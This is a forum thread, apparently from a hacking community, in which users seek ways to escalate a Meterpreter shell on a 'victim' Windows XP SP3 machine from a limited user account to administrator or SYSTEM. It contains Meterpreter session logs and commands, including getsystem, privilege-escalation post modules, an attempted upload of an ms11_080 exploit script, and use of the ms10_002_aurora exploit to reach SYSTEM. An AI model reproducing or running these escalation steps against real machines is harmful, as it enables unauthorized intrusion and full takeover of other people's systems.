
Admin/System Level Escalation For Windows XP Via Meterpreter


Greetings fellow hackers. I am trying to figure out a way to open a meterpreter shell on a victim machine that is running a Windows XP limited user account. Getsystem and use priv only seem to be working for escalation from Admin to system, but I am trying to go from limited user to admin.

I was using the uacbypass module for windows 7 limited user accounts, but can't find anything similar for XP.

Any ideas?

To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys.

You are mostly right in that getsystem will typically get you system level privs, but then you can use incognito or migrate processes to obtain other user rights. However, on XP SP2 getsystem should work from any meterpreter session, at least it always has for me. I wish I could help more, but it sounds like a module is not working quite right for you. Are you running in trunk? Did you do an msfupdate?

Hey guys. Looks like only SP2 is vulnerable to this module. I tried several different modules and none of them work in SP3.

Does anyone know a way to elevate a limited user account to either Admin/SYS in SP3?

meterpreter > getuid
Server username: testinglimited\limited
meterpreter > 

meterpreter > run post/windows/escalate/getsystem

[-] Post failed: Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: Access is denied.
[-] Call stack:
[-]   /opt/framework-4.0.0/msf3/lib/rex/post/meterpreter/extensions/priv/priv.rb:68:in `getsystem'
[-]   /opt/framework-4.0.0/msf3/modules/post/windows/escalate/getsystem.rb:59:in `run'

meterpreter > run post/windows/escalate/ms10_092_schelevator

[-] Windows XP (Build 2600, Service Pack 3). is not vulnerable.

I found this Python script that will respawn a system/admin shell from an XP SP3 limited user account. I already have a meterpreter shell on the box. Goal is to get from limited user to admin/sys.


The problem is that I can't upload files via a meterpreter limited access shell.

meterpreter > upload /tmp/ms11_080.py C:\\
[*] uploading  : /tmp/ms11_080.py -> C:\
[-] core_channel_open: Operation failed: Access is denied.

Any ideas?

Don't know what else to tell you.

I just fired up XP SP3 (I also know these work in SP2), ran the aurora exploit against it (ms10_002_aurora):

meterpreter > getuid

Server username: computer\user

meterpreter > getsystem

...got system (via technique 4).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Then I tried your method, using the module getsystem.rb explicitly and same thing more or less.

meterpreter > getuid

Server username: computer\user

meterpreter > run post/windows/escalate/getsystem

[+] Obtained SYSTEM via technique 4

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Which exploit are you using? Which payload?
